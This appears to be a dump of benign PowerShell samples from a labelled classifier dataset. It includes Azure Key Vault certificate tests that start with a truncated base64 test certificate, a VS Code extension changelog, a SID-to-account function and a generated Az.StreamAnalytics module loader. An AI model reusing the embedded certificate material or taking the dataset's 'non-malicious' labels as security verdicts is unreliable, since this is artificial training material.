DQEHBqCCBAAwggP8AgEAMIID9QYJKoZIhvcNAQcBMBwGCiqGSIb3DQEMAQYwDgQIASxP9mK8d4ACAgfQgIIDyEzSvzZ5A/rshEqx45iShdofUV7ytp/7vA687VQC+M9IopwqpNI7joaRaNXHJVYENDM/qpRfkUEkoxGY2jo2rN7cUT5LI3XAB81aDTbs3R/u6ozt8FliKqN3e9ITv7+DWKYh3buIKcH5mIXK7yVXOPBr1uPgO/tX9Y6VHtsrId4We1Dd0/xnx3HeN8IyWG4OcYrg1niRSwsGX1Opplz23sm4yA1iGqzszYRfLst05FwEE03HnGy7U5XOvShQSKGxsDiXW8Un0HuAhrtY9n3khcSvMwihxn5LIO9wyRPvTGucFE8brXPXKRoco27RjurbTvxhiJ0E9mHHdabzxORD9swioQTNXO5C0LMCX2WD3OvvieqmOXBz77kn5E9ELHD2DCT3FW7ycoHwV5MuBVoEr84RGkqqncJarqn5FGJPuRqw//XLSCOcziPVkHM37tsfLd1OCH1BGz3+EU3AHxSspL7WzRIBBJXX4pU60kXnLPoR3E6jtAdE2pSlgVtlKiRlyTYqOzRAp7UldweG7RlIIJUVRSWMbu7pdB7SSZsmQEpuRGicnVJvoDP5nXw1WWFAQ56P0kvkZzu3M9cyyM4e86ZSHElsVcXtFoiSOPBJgSvClLgV7Hu+0+bZE7yRqERlRNFP/N/fEUVJ3FsYGJ1vqlKWY7RpjbSOm/aWFWmXOKqF8ke5upevLg8VNiVPvnVjVxPiLBRMYRHnRCgIlXCw0Pheaxe0GwiytzpbgZ7KVkTp4811ixlN75XoWgi0luDDF4477/DcxcSE8CYtDnMrDtJjWR2Q1RP5Fhqrm5AqGmB1ibYd3Z3T7NgrmAWDEJD5emUhQ2+AJ3Lz5rs447dwpkqDXboOvVKq+ZsJzFBkyjAnC/QvD0pHJABH/xqod4cURjda1pWDwbKp1nuYIadlacXjtpjldps0zyrq4JtqfGbXMOupVerFC7g7gNPsm7WN0SLn8D+mTHxpUbF1KZ8FhV+aAjmLYb08tQhj2HuFPfp+xyXru0siuVxhNrq/gRPBhA7/l8qkQbeYGVuTWAyEHS6Lfz/wfQ7pqFGH2uGG/Lm991rLenYKkgORy+kzRj40vgmm2b9N+DbxBkmN5nAMzhpgSH/JAUofafPZmKY4DEWdNIog0WZjfD6uOrvYTiDS4m088f4mRdACWC5ep6/WcWPupGyP6b3RL6TewUzQKhZ95xHmcCZE1zvraN4G68CVRrapP6b6AinI6AoftSZbRuvaZtH2bub9P2z4KxLCx/ZApat+adhdVrFrXtMzHYGxX3mT6GWIljdPMDcwHzAHBgUrDgMCGgQU5BkyRJGOXInsB0WQ8fHNBHcvtSsEFBe+eeNPhqP0bASoHb5LK0+9+hV1"
$cert = Import-AzKeyVaultCertificate $keyVault $certificateName -CertificateString $pfxBase64
Assert-NotNull $cert
Assert-NotNull $cert.Name
$x509FromSecret = Get-X509FromSecretBySubjectDistinguishedName $keyVault $cert.Name "CN=*.microsoft.com"
Assert-NotNull $x509FromSecret
Assert-True { $x509FromSecret.HasPrivateKey }
$key = Get-AzKeyVaultKey $keyVault $cert.Name
Assert-NotNull $key
}
function Test_MergeCerWithNonExistantKeyPair
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'mergecerwithnonexistankeypair'
$cert = CreateAKVCertificate $keyVault $certificateName
$cerPath = Get-FilePathFromCommonData 'mergecer01.cer'
Assert-Throws { $cert = Import-AzKeyVaultCertificate $keyVault $certificateName -FilePath $cerPath }
}
function Test_MergeCerWithMismatchKeyPair
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'mergecerwithmismatchkeypair'
$policy = New-AzKeyVaultCertificatePolicy -DnsNames "test1.keyvault.com", "test2.keyvault.com" -IssuerName "Unknown"
$certRequest = Add-AzKeyVaultCertificate $keyVault $certificateName $policy
Assert-NotNull $certRequest
Assert-NotNull $certRequest.CertificateSigningRequest
$global:createdCertificates += $certificateName
$cerPath = Get-FilePathFromCommonData 'mergecer01.cer'
Assert-Throws { $cert = Import-AzKeyVaultCertificate $keyVault $certificateName -FilePath $cerPath }
}
function Test_GetCertificate
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'getcertificate'
$createdCert = CreateAKVCertificate $keyVault $certificateName
$retrievedCert = Get-AzKeyVaultCertificate $keyVault $certificateName
Assert-NotNull $retrievedCert
Assert-True { Equal-String $createdCert.Name $retrievedCert.Name }
}
function Test_GetCertificateNonExistant
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'getcertificatenonexistant'
$cert = Get-AzKeyVaultCertificate $keyVault $certificateName
Assert-Null $cert
}
function Test_GetCertificateInABadVault
{
$certificateName = Get-CertificateName 'getcertificatenonexistant'
Assert-Throws { Get-AzKeyVaultCertificate '$vaultName' $certificateName }
}
function Test_ListCertificates
{
$keyVault = Get-KeyVault
$certificateName01 = Get-CertificateName 'listcertificates01'
$createdCert01 = CreateAKVCertificate $keyVault $certificateName01
Assert-NotNull $createdCert01
$certificateName02 = Get-CertificateName 'listcertificates02'
$createdCert02 = CreateAKVCertificate $keyVault $certificateName02
Assert-NotNull $createdCert02
$certificates = Get-AzKeyVaultCertificate $keyVault
Assert-NotNull $certificates
Assert-True { $certificates.Count -ge 2 }
$item01 = $certificates | where { Equal-String $_.Name $certificateName01 } | Select -First 1
Assert-NotNull $item01
$item02 = $certificates | where { Equal-String $_.Name $certificateName02 } | Select -First 1
Assert-NotNull $item02
}
function Test_AddAndGetCertificateContacts
{
$keyVault = Get-KeyVault
$originalContacts = @('admin1@contoso.com', 'admin2@contoso.com' )
$retrievedContacts = Get-AzKeyVaultCertificateContact $keyVault
Assert-True { $retrievedContacts.Count -eq 0 }
$setContacts = Add-AzKeyVaultCertificateContact $keyVault $originalContacts[0] -PassThru
Assert-True { $setContacts.Count -eq 1 }
$setContacts = Add-AzKeyVaultCertificateContact $keyVault $originalContacts[1] -PassThru
Assert-True { Equal-OperationList $originalContacts $setContacts.Email }
$retrievedContacts = Get-AzKeyVaultCertificateContact $keyVault
Assert-True { Equal-OperationList $originalContacts $retrievedContacts.Email }
Remove-AzKeyVaultCertificateContact $keyVault $originalContacts[1]
$remainingContacts = Remove-AzKeyVaultCertificateContact $keyVault $originalContacts[0] -PassThru
Assert-True { $remainingContacts.Count -eq 0 }
Assert-Throws { Remove-AzKeyVaultCertificateContact $keyVault $originalContacts[0] }
}
function Test_GetNonExistingCertificatePolicy
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'getcertificatenonexistant'
$policy = Get-AzKeyVaultCertificatePolicy $keyVault $certificateName
Assert-Null $policy
}
function Test_NewCertificatePolicy
{
$policy = New-AzKeyVaultCertificatePolicy -SubjectName "CN=testCertificate" -IssuerName Self
Assert-NotNull $policy
$policy = New-AzKeyVaultCertificatePolicy -SubjectName "CN=testCertificate" -DnsNames "testCertificate.com","testCertificate2.com" -IssuerName Self
Assert-NotNull $policy
$policy = New-AzKeyVaultCertificatePolicy -SubjectName "CN=testCertificate" -Ekus "1.0","2.0" -IssuerName Self
Assert-NotNull $policy
Assert-Throws { $policy = New-AzKeyVaultCertificatePolicy -Ekus "1.0","2.0" -SecretContentType application/x-pem-file -ReuseKeyOnRenewal -Disabled -RenewAtNumberOfDaysBeforeExpiry 10 -ValidityInMonths 10 -IssuerName Self }
$policy = New-AzKeyVaultCertificatePolicy -SubjectName "CN=testCertificate" -Ekus "1.0","2.0" -SecretContentType application/x-pem-file -ReuseKeyOnRenewal -Disabled -RenewAtNumberOfDaysBeforeExpiry 10 -ValidityInMonths 10 -IssuerName Self
Assert-NotNull $policy
$policy = New-AzKeyVaultCertificatePolicy -SubjectName "CN=testCertificate" -Ekus "1.0","2.0" -SecretContentType application/x-pem-file -ReuseKeyOnRenewal -Disabled -RenewAtNumberOfDaysBeforeExpiry 10 -ValidityInMonths 10 -IssuerName Self -EmailAtNumberOfDaysBeforeExpiry 15
Assert-NotNull $policy
$customEkus = @("1.0", "2.0")
$customKeyUsage = @("DecipherOnly", "KeyCertSign")
$policy = New-AzKeyVaultCertificatePolicy -SubjectName "CN=testCertificate" -Ekus $customEkus -SecretContentType application/x-pem-file -ReuseKeyOnRenewal -Disabled -RenewAtNumberOfDaysBeforeExpiry 10 -ValidityInMonths 10 -IssuerName Self -KeyUsage $customKeyUsage
Assert-NotNull $policy
Assert-NotNull $policy.KeyUsage
Assert-True { Equal-OperationList $policy.KeyUsage $customKeyUsage }
Assert-NotNull $policy.Ekus
Assert-True { Equal-OperationList $policy.Ekus $customEkus }
}
function Test_SetCertificatePolicy
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'setcertificatepolicycertificate01'
$createdCert = CreateAKVCertificate $keyVault $certificateName
$policy = New-AzKeyVaultCertificatePolicy -SubjectName "CN=testCertificate" -Ekus "1.0","2.0" -SecretContentType application/x-pem-file -ReuseKeyOnRenewal -Disabled -RenewAtNumberOfDaysBeforeExpiry 10 -ValidityInMonths 10 -IssuerName Self
$policySet = Set-AzKeyVaultCertificatePolicy $keyVault $certificateName $policy -PassThru
Assert-NotNull $policySet
}
function Test_NewOrganizationDetails
{
$admin1Details = New-AzKeyVaultCertificateAdministratorDetails -EmailAddress "admin1@contoso.com"
Assert-NotNull $admin1Details
$admin2Details = New-AzKeyVaultCertificateAdministratorDetails -EmailAddress "admin2@contoso.com" -FirstName "admin" -LastName "2"
Assert-NotNull $admin2Details
$orgDetails = New-AzKeyVaultCertificateOrganizationDetails -Id "MSFT" -AdministratorDetails $admin1Details, $admin2Details
Assert-NotNull $orgDetails
}
function Test_CreateSSLAdminIssuer
{
$keyVault = Get-KeyVault
$issuerName = "SSLAdminIssuer"
$issuerProvider = "SSLAdmin"
$admin1Details = New-AzKeyVaultCertificateAdministratorDetails -EmailAddress "admin1@contoso.com"
$admin2Details = New-AzKeyVaultCertificateAdministratorDetails -EmailAddress "admin2@contoso.com" -FirstName "admin" -LastName "2"
$admin3Details = New-AzKeyVaultCertificateAdministratorDetails -EmailAddress "admin3@contoso.com" -FirstName "admin" -LastName "3" -PhoneNumber "425-555-5555"
$orgDetails = New-AzKeyVaultCertificateOrganizationDetails -AdministratorDetails $admin1Details, $admin2Details, $admin3Details
$issuer1 = Set-AzKeyVaultCertificateIssuer $keyVault $issuerName -IssuerProvider $issuerProvider -OrganizationDetails $orgDetails -PassThru
Assert-NotNull $issuer1
Assert-AreEqual $issuer1.Name $issuerName
Assert-AreEqual $issuer1.IssuerProvider $issuerProvider
Assert-Null $issuer1.OrganizationDetails
Assert-Null $issuer1.ApiKey
Assert-Null $issuer1.AccountName
Remove-AzKeyVaultCertificateIssuer $keyVault $issuerName
}
function Test_CreateAndGetTestIssuer
{
$keyVault = Get-KeyVault
$issuer01Name = "getissuer01"
$nonExistingIssuerName = "non-existingissuer"
$adminDetails = New-AzKeyVaultCertificateAdministratorDetails -EmailAddress "admin@contoso.com" -FirstName "admin" -LastName "admin" -PhoneNumber "425-555-5555"
$orgDetails = New-AzKeyVaultCertificateOrganizationDetails -Id "MSFT" -AdministratorDetails $adminDetails
$issuerAdded = Set-AzKeyVaultCertificateIssuer $keyVault $issuer01Name -IssuerProvider "Test" -OrganizationDetails $orgDetails -PassThru
$issuerGotten = Get-AzKeyVaultCertificateIssuer $keyVault $issuer01Name
Assert-AreEqual $issuerAdded.Name $issuerGotten.Name
$noneexisting = Get-AzKeyVaultCertificateIssuer $keyVault $nonExistingIssuerName
Assert-Null $noneexisting
$issuers = Get-AzKeyVaultCertificateIssuer $keyVault
Assert-True { $issuers.Count -ge 1 }
$issuer01 = $issuers | where { Equal-String $_.Name $issuer01Name } | Select -First 1
Assert-NotNull $issuer01
$issuerGotten = Remove-AzKeyVaultCertificateIssuer $keyVault $issuer01Name -Force -PassThru
Assert-NotNull $issuerGotten
Assert-Throws { Remove-AzKeyVaultCertificateIssuer $keyVault $issuer01Name -Force }
}
function Test_Add_AzureKeyVaultCertificate
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'certWithEnrollment'
$policy = New-AzKeyVaultCertificatePolicy -SubjectName "CN=testCertificate" -IssuerName Self
$certificateOperation = Add-AzKeyVaultCertificate $keyVault $certificateName $policy
$global:createdCertificates += $certificateName
Assert-NotNull $certificateOperation
$pollCount = 0
while (($certificateOperation.Status -eq 'inProgress') -and ($pollCount -lt 10))
{
Assert-NotNull $certificateOperation.CertificateSigningRequest
Assert-Null $certificateOperation.Information
Assert-Null $certificateOperation.ErrorCode
Assert-Null $certificateOperation.ErrorMessage
Start-Sleep -s 10
$certificateOperation = Get-AzKeyVaultCertificateOperation $keyVault $certificateName
$pollCount++
}
Assert-NotNull $certificateOperation
Assert-AreEqual "completed" $certificateOperation.Status
Assert-NotNull $certificateOperation.CertificateSigningRequest
Assert-Null $certificateOperation.Information
Assert-Null $certificateOperation.ErrorCode
Assert-Null $certificateOperation.ErrorMessage
$certificate = Get-AzKeyVaultCertificate $keyVault $certificateName
Assert-NotNull $certificate
Assert-NotNull $certificate.Certificate
$certificateOperation = Remove-AzKeyVaultCertificateOperation $keyVault $certificateName -Force -PassThru
Assert-NotNull $certificateOperation
$certop = Get-AzKeyVaultCertificateOperation $keyVault $certificateName
Assert-Null $certop
Assert-Throws { Remove-AzKeyVaultCertificateOperation $keyVault $certificateName -Force }
}
function Test_CertificateTags
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'certificatetags'
$tags = @{}
$tags.Add("Org", "Azure")
$tags.Add("Team", "KeyVault")
$pfxPath = Get-FilePathFromCommonData 'importpfx01.pfx'
$securePfxPassword = ConvertTo-SecureString $pfxPassword -AsPlainText -Force
$createdCert = Import-AzKeyVaultCertificate $keyVault $certificateName -FilePath $pfxPath -Password $securePfxPassword -Tag $tags
$global:createdCertificates += $certificateName
$retrievedCertificate = Get-AzKeyVaultCertificate $keyVault $certificateName
Assert-NotNull $retrievedCertificate
Assert-NotNull $retrievedCertificate.Tags
Assert-AreEqual $retrievedCertificate.Tags.Count 2
Assert-AreEqual $retrievedCertificate.Tags.ContainsKey("Org") $true
Assert-AreEqual $retrievedCertificate.Tags["Org"] "Azure"
Assert-AreEqual $retrievedCertificate.Tags.ContainsKey("Team") $true
Assert-AreEqual $retrievedCertificate.Tags["Team"] "KeyVault"
}
function Test_UpdateCertificateTags
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'updatecertificatetags'
$tags = @{}
$tags.Add("Org", "Azure")
$tags.Add("Team", "KeyVault")
$pfxPath = Get-FilePathFromCommonData 'importpfx01.pfx'
$securePfxPassword = ConvertTo-SecureString $pfxPassword -AsPlainText -Force
$createdCert = Import-AzKeyVaultCertificate $keyVault $certificateName -FilePath $pfxPath -Password $securePfxPassword -Tag $tags
$global:createdCertificates += $certificateName
$retrievedCertificate = Get-AzKeyVaultCertificate $keyVault $certificateName
Assert-NotNull $retrievedCertificate
Assert-NotNull $retrievedCertificate.Tags
Assert-AreEqual $retrievedCertificate.Tags.Count 2
Assert-AreEqual $retrievedCertificate.Tags.ContainsKey("Org") $true
Assert-AreEqual $retrievedCertificate.Tags["Org"] "Azure"
Assert-AreEqual $retrievedCertificate.Tags.ContainsKey("Team") $true
Assert-AreEqual $retrievedCertificate.Tags["Team"] "KeyVault"
$tags = @{}
Set-AzKeyVaultCertificateAttribute $keyVault $certificateName -Tag $tags
$retrievedCertificate = Get-AzKeyVaultCertificate $keyVault $certificateName
Assert-NotNull $retrievedCertificate
Assert-NotNull $retrievedCertificate.Tags
Assert-AreEqual $retrievedCertificate.Tags.Count 0
$tags = @{}
$tags.Add("Org", "Azure")
$tags.Add("Team", "KeyVault")
Set-AzKeyVaultCertificateAttribute $keyVault $certificateName -Tag $tags
$retrievedCertificate = Get-AzKeyVaultCertificate $keyVault $certificateName
Assert-NotNull $retrievedCertificate
Assert-NotNull $retrievedCertificate.Tags
Assert-AreEqual $retrievedCertificate.Tags.Count 2
Assert-AreEqual $retrievedCertificate.Tags.ContainsKey("Org") $true
Assert-AreEqual $retrievedCertificate.Tags["Org"] "Azure"
Assert-AreEqual $retrievedCertificate.Tags.ContainsKey("Team") $true
Assert-AreEqual $retrievedCertificate.Tags["Team"] "KeyVault"
$tags = @{}
$tags.Add("State", "Washington")
$tags.Add("City", "Redmond")
Set-AzKeyVaultCertificateAttribute $keyVault $certificateName -Tag $tags
$retrievedCertificate = Get-AzKeyVaultCertificate $keyVault $certificateName
Assert-NotNull $retrievedCertificate
Assert-NotNull $retrievedCertificate.Tags
Assert-AreEqual $retrievedCertificate.Tags.Count 2
Assert-AreEqual $retrievedCertificate.Tags.ContainsKey("State") $true
Assert-AreEqual $retrievedCertificate.Tags["State"] "Washington"
Assert-AreEqual $retrievedCertificate.Tags.ContainsKey("City") $true
Assert-AreEqual $retrievedCertificate.Tags["City"] "Redmond"
}
function Test_GetDeletedCertificate
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'getdeletedcertificate'
$createdCert = CreateAKVCertificate $keyVault $certificateName
Assert-NotNull $createdCert
$global:createdCertificates += $certificateName
$createdCertificate | Remove-AzKeyVaultCertificate -Force -Confirm:$false
Wait-ForDeletedCertificate $keyVault $certificateName
$deletedCertificate = Get-AzKeyVaultCertificate -VaultName $keyVault.VaultName -Name $certificateName -InRemovedState
Assert-NotNull $deletedCertificate
Assert-NotNull $deletedCertificate.DeletedDate
Assert-NotNull $deletedCertificate.ScheduledPurgeDate
}
function Test_GetDeletedCertificates
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'getdeletedcertificates'
$createdCert = CreateAKVCertificate $keyVault $certificateName
Assert-NotNull $createdCert
$global:createdCertificates += $certificateName
$createdCertificate | Remove-AzKeyVaultCertificate -Force -Confirm:$false
Wait-ForDeletedCertificate $keyVault $certificateName
$deletedCerts = Get-AzKeyVaultCertificate -VaultName $keyVault.VaultName -InRemovedState
Assert-True {$deletedCerts.Count -ge 1}
Assert-True {$deletedCerts.Name -contains $key.Name}
}
function Test_UndoRemoveCertificate
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'undoremovedcert'
$createdCert = CreateAKVCertificate $keyVault $certificateName
Assert-NotNull $createdCert
$global:createdCertificates += $certificateName
$createdCertificate | Remove-AzKeyVaultCertificate -Force -Confirm:$false
Wait-ForDeletedCertificate $keyVault $certificateName
$recoveredCert = Undo-AzKeyVaultCertificateRemoval -VaultName $keyVault.VaultName -Name $certificateName
Assert-NotNull $recoveredCert
Assert-AreEqual $recoveredCert.Name $createdCert.Name
Assert-AreEqual $recoveredCert.Version $createdCert.Version
}
function Test_RemoveDeletedCertificate
{
$keyVault = Get-KeyVault
$certificateName = Get-CertificateName 'undoremovedcert'
$createdCert = CreateAKVCertificate $keyVault $certificateName
Assert-NotNull $createdCert
$global:createdCertificates += $certificateName
$createdCertificate | Remove-AzKeyVaultCertificate -Force -Confirm:$false
Wait-ForDeletedCertificate $keyVault $certificateName
Remove-AzKeyVaultCertificate -VaultName $keyVault.VaultName -Name $certificateName -InRemovedState -Force -Confirm:$false
}
function Test_RemoveNonExistDeletedCertificate
{
$keyVault = Get-KeyVault
$certName = Get-CertificateName 'purgeactivecert'
$createdCert = CreateAKVCertificate $keyVault $certName
Assert-NotNull $createdCert
$global:createdCertificates += $certName
Assert-Throws {Remove-AzKeyVaultCertificate -VaultName $keyVault.VaultName -Name $certName -InRemovedState -Force -Confirm:$false}
}
function Test_PipelineRemoveDeletedCertificates
{
$rootCertName = 'piperemovecert'
$keyVault = Get-KeyVault
$certName = Get-CertificateName $rootCertName + '1'
$createdCert1 = CreateAKVCertificate $keyVault $certName
Assert-NotNull $createdCert1
$certName = Get-CertificateName $rootCertName + '2'
$createdCert2 = CreateAKVCertificate $keyVault $certName
Assert-NotNull $createdCert2
Get-AzKeyVaultCertificate $keyVault | Where-Object {$_.CertificateName -like $rootCertName + '*'} | Remove-AzKeyVaultCertificate -Force -Confirm:$false
Wait-Seconds 30
Get-AzKeyVaultCertificate $keyVault -InRemovedState | Where-Object {$_.CertificateName -like $rootCertName + '*'} | Remove-AzKeyVaultCertificate -Force -Confirm:$false -InRemovedState
$certs = Get-AzKeyVaultCertificate $keyVault -InRemovedState | Where-Object {$_.CertificateName -like $rootCertName + '*'}
Assert-AreEqual $keys.Count 0
}
|
combined_dataset/train/non-malicious/sample_41_42.ps1
|
sample_41_42.ps1
|
# Change Log
## 0.1.18(20240222)
- 使用neovim插件替换vim
## 0.1.17(20230703)
- 使用vscodeintellicode
## 0.1.16(20230626)
- 去掉Codeium (PS: 需要时单独启用, 每开启一个VSCode 都会启动两个language_server_windows_x64.exe进程, 窗口过多时会导致系统卡顿.)
## 0.1.15(20230323)
- 使用codeium替代codegeex
- 去掉code-spell-checker, vscodeintellicode
## 0.1.14(20230313)
- 使用GitLess替换GitLens
## 0.1.13(20230227)
- 添加codegeex
- 去掉bookmark, color-highlight
## 0.1.12(20220727)
- 去掉使用频率不高的扩展
## 0.1.11(20220714)
- 添加 BenRogersWPG.websearchengine
## 0.1.10(20220713)
- 添加 Color Highlight
## 0.1.9(20220701)
- 添加 all autocomplete
- 取消 intellicode
## 0.1.8(20220627)
- 添加 Bookmarks 书签
## 0.1.7(20220622)
- 添加 GitHub.remotehub, ms-vscode.remote-repositories
## 0.1.6(20220622)
- 去掉 GitHub.copilot, 试用到期了
- 使用 VisualStudioExptTeam.vscodeintellicode
## 0.1.5(20220617)
- 更换护眼主题 eyeshield
- 修改 README 介绍中的图标
## 0.1.4(20220617)
- 试了下 还是得 eyes-love, 默认主题看久了 眼花
## 0.1.3(20220613)
- 去掉 Visual Studio IntelliCode, 跟 GitHub Copilot 功能重了
## 0.1.2(20220609)
- 调整使用 anaer.git-user-profiles-config
## 0.1.1(20220513)
- 移除 RestClient, 使用 Thunder Client
- 移除 WakaTime, 用的不多
## 0.1.0(20220412)
- 移除 eyes-love
## 0.0.9(20220411)
- 移除使用较少的扩展: alefragnani.bookmarks, chen86860.json-sorter, luyuhuang.rss
## 0.0.8(20220121)
- 添加 rss 阅读器
## 0.0.7(20220120)
- 添加 git Config User profiles
## 0.0.6(20211209)
- 添加 WakaTime
## 0.0.5(20211105)
- 添加 humao.rest-client
## 0.0.4(20211102)
- 添加 json sorter
## 0.0.3(20211102)
- 添加 prettier, code spell checker
## 0.0.1(20211028)
- 初始化公共包
|
combined_dataset/train/non-malicious/Convert-FspToUsername.ps1
|
Convert-FspToUsername.ps1
|
Function Convert-FspToUsername
{
<#
.SYNOPSIS
Convert a FSP to a sAMAccountName
.DESCRIPTION
This function converts FSP's to sAMAccountName's.
.PARAMETER UserSID
This is the SID of the FSP in the form of S-1-5-20. These can be found
in the ForeignSecurityPrincipals container of your domain.
.EXAMPLE
Convert-FspToUsername -UserSID "S-1-5-11","S-1-5-17","S-1-5-20"
sAMAccountName Sid
-------------- ---
NT AUTHORITY\\Authenticated Users S-1-5-11
NT AUTHORITY\\IUSR S-1-5-17
NT AUTHORITY\\NETWORK SERVICE S-1-5-20
Description
===========
This example shows passing in multipe sids to the function
.EXAMPLE
Get-ADObjects -ADSPath "LDAP://CN=ForeignSecurityPrincipals,DC=company,DC=com" -SearchFilter "(objectClass=foreignSecurityPrincipal)" |
foreach {$_.Properties.name} |Convert-FspToUsername
sAMAccountName Sid
-------------- ---
NT AUTHORITY\\Authenticated Users S-1-5-11
NT AUTHORITY\\IUSR S-1-5-17
NT AUTHORITY\\NETWORK SERVICE S-1-5-20
Description
===========
This example takes the output of the Get-ADObjects function, and pipes it through foreach to get to the name
property, and the resulting output is piped through Convert-FspToUsername.
.NOTES
This function currently expects a SID in the same format as you see being displayed
as the name property of each object in the ForeignSecurityPrincipals container in your
domain.
.LINK
http://scripts.patton-tech.com/wiki/PowerShell/ActiveDirectoryManagement#Convert-FspToUsername
#>
Param
(
[Parameter(
Position=0,
Mandatory=$true,
ValueFromPipeline=$true)]
$UserSID
)
Begin
{
}
Process
{
foreach ($Sid in $UserSID)
{
try
{
$SAM = (New-Object System.Security.Principal.SecurityIdentifier($Sid)).Translate([System.Security.Principal.NTAccount])
$Result = New-Object -TypeName PSObject -Property @{
Sid = $Sid
sAMAccountName = $SAM.Value
}
Return $Result
}
catch
{
$Result = New-Object -TypeName PSObject -Property @{
Sid = $Sid
sAMAccountName = $Error[0].Exception.InnerException.Message.ToString().Trim()
}
Return $Result
}
}
}
End
{
}
}
|
combined_dataset/train/non-malicious/sample_37_63.ps1
|
sample_37_63.ps1
|
# region Generated
# ----------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code
# is regenerated.
# ----------------------------------------------------------------------------------
# Load required Az.Accounts module
$accountsName = 'Az.Accounts'
$accountsModule = Get-Module -Name $accountsName
if(-not $accountsModule) {
$localAccountsPath = Join-Path $PSScriptRoot 'generated\modules'
if(Test-Path -Path $localAccountsPath) {
$localAccounts = Get-ChildItem -Path $localAccountsPath -Recurse -Include 'Az.Accounts.psd1' | Select-Object -Last 1
if($localAccounts) {
$accountsModule = Import-Module -Name ($localAccounts.FullName) -Scope Global -PassThru
}
}
if(-not $accountsModule) {
$hasAdequateVersion = (Get-Module -Name $accountsName -ListAvailable | Where-Object { $_.Version -ge [System.Version]'2.7.5' } | Measure-Object).Count -gt 0
if($hasAdequateVersion) {
$accountsModule = Import-Module -Name $accountsName -MinimumVersion 2.7.5 -Scope Global -PassThru
}
}
}
if(-not $accountsModule) {
Write-Error "`nThis module requires $accountsName version 2.7.5 or greater. For installation instructions, please see: https://learn.microsoft.com/powershell/azure/install-az-ps" -ErrorAction Stop
} elseif (($accountsModule.Version -lt [System.Version]'2.7.5') -and (-not $localAccounts)) {
Write-Error "`nThis module requires $accountsName version 2.7.5 or greater. An earlier version of Az.Accounts is imported in the current PowerShell session. If you are running test, please try to add the switch '-RegenerateSupportModule' when executing 'test-module.ps1'. Otherwise please open a new PowerShell session and import this module again.`nAdditionally, this error could indicate that multiple incompatible versions of Azure PowerShell modules are installed on your system. For troubleshooting information, please see: https://aka.ms/azps-version-error" -ErrorAction Stop
}
Write-Information "Loaded Module '$($accountsModule.Name)'"
# Load the private module dll
$null = Import-Module -Name (Join-Path $PSScriptRoot './bin/Az.StreamAnalytics.private.dll')
# Get the private module's instance
$instance = [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Module]::Instance
# Ask for the shared functionality table
$VTable = Register-AzModule
# Tweaks the pipeline on module load
$instance.OnModuleLoad = $VTable.OnModuleLoad
# Following two delegates are added for telemetry
$instance.GetTelemetryId = $VTable.GetTelemetryId
$instance.Telemetry = $VTable.Telemetry
# Delegate to sanitize the output object
$instance.SanitizeOutput = $VTable.SanitizerHandler
# Delegate to get the telemetry info
$instance.GetTelemetryInfo = $VTable.GetTelemetryInfo
# Tweaks the pipeline per call
$instance.OnNewRequest = $VTable.OnNewRequest
# Gets shared parameter values
$instance.GetParameterValue = $VTable.GetParameterValue
# Allows shared module to listen to events from this module
$instance.EventListener = $VTable.EventListener
# Gets shared argument completers
$instance.ArgumentCompleter = $VTable.ArgumentCompleter
# The name of the currently selected Azure profile
$instance.ProfileName = $VTable.ProfileName
# Load the custom module
$customModulePath = Join-Path $PSScriptRoot './custom/Az.StreamAnalytics.custom.psm1'
if(Test-Path $customModulePath) {
$null = Import-Module -Name $customModulePath
}
# Export nothing to clear implicit exports
Export-ModuleMember
# Export proxy cmdlet scripts
$exportsPath = Join-Path $PSScriptRoot './exports'
$directories = Get-ChildItem -Directory -Path $exportsPath
$profileDirectory = $null
if($instance.ProfileName) {
if(($directories | ForEach-Object { $_.Name }) -contains $instance.ProfileName) {
$profileDirectory = $directories | Where-Object { $_.Name -eq $instance.ProfileName }
} else {
# Don't export anything if the profile doesn't exist for the module
$exportsPath = $null
Write-Warning "Selected Azure profile '$($instance.ProfileName)' does not exist for module '$($instance.Name)'. No cmdlets were loaded."
}
} elseif(($directories | Measure-Object).Count -gt 0) {
# Load the last folder if no profile is selected
$profileDirectory = $directories | Select-Object -Last 1
}
if($profileDirectory) {
Write-Information "Loaded Azure profile '$($profileDirectory.Name)' for module '$($instance.Name)'"
$exportsPath = $profileDirectory.FullName
}
if($exportsPath) {
Get-ChildItem -Path $exportsPath -Recurse -Include '*.ps1' -File | ForEach-Object { . $_.FullName }
$cmdletNames = Get-ScriptCmdlet -ScriptFolder $exportsPath
Export-ModuleMember -Function $cmdletNames -Alias (Get-ScriptCmdlet -ScriptFolder $exportsPath -AsAlias)
}
# Finalize initialization of this module
$instance.Init();
Write-Information "Loaded Module '$($instance.Name)'"
# endregion
# SIG # Begin signature block
# MIIoPAYJKoZIhvcNAQcCoIIoLTCCKCkCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBRCJcvlhXt3xbD
# 19O92sEUWHco66AskO2t+T49JpIVDaCCDYUwggYDMIID66ADAgECAhMzAAADri01
# UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
